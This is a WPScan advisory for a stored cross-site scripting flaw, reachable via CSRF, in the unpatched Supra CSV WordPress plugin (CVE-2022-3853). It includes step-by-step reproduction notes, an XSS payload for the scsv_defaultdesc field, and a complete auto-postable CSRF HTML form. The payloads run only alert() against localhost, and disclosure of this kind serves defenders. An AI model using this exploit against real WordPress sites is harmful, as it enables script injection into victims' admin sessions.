WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Supra CSV <= 4.0.3 - Stored Cross-Site Scripting via CSRF

Description

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.
I have found a Stored XSS on the plugin Supra CSV Version: 4.0.3. Here is the official page of the plugin given below
https://wordpress.org/plugins/supra-csv-parser

Proof of Concept

Step to reproduce:
Step1: Download and install the plugin
Step2:Activate and go to the setting of the plugin.
Step3:Give the details and intercept the request using burp suite.
Step4:The parameter "scsv_defaultdesc="is vulnerable to XSS with the below payload
ā€œ xss</textarea></p><script>alert(1)</script>// ā€
Step5:From this script we can see the plugin is vulnerable to stored XSS.
Step6:Generate CSRF payload for the request and send it to the victim.
Step7: CSRF payload is given below
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=supra_csv_admin" method="POST">
      <input type="hidden" name="scsv&#95;wpname" value="xss1&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;wppass" value="xss2&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;autopub" value="0" />
      <input type="hidden" name="scsv&#95;posttype" value="post" />
      <input type="hidden" name="scsv&#95;defaulttitle" value="xss3&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;defaultdesc" value="xss4&lt;&#47;textarea&gt;&lt;&#47;p&gt;&lt;script&gt;alert&#40;2&#41;&lt;&#47;script&gt;&#47;&#47;" />
      <input type="hidden" name="scsv&#95;custom&#95;terms" value="xss5&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;csv&#95;settings&#91;delimiter&#93;" value="&#44;xss6&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;csv&#95;settings&#91;enclosure&#93;" value="&quot;xss7&lt;&gt;&quot;&apos;&#47;" />
      <input type="hidden" name="scsv&#95;csv&#95;settings&#91;escape&#93;" value="&#92;" />
      <input type="hidden" name="scsv&#95;line&#95;maxlen" value="1000" />
      <input type="hidden" name="scsv&#95;submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Step8: Stored XSS is successfully executed with CSRF vulnerability.

Affects Plugins

supra-csv-parser
No known fix - plugin closed

References

CVE
CVE-2022-3853

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Rahul selvakumar

Submitter

Rahul selvakumar

Verified

Yes

WPVDB ID
c2bc7d23-5bfd-481c-b42b-da7ee80d9514

Timeline

Publicly Published

2022-12-05 (about 5 months ago)

Added

2022-11-21 (about 6 months ago)

Last Updated

2022-11-21 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin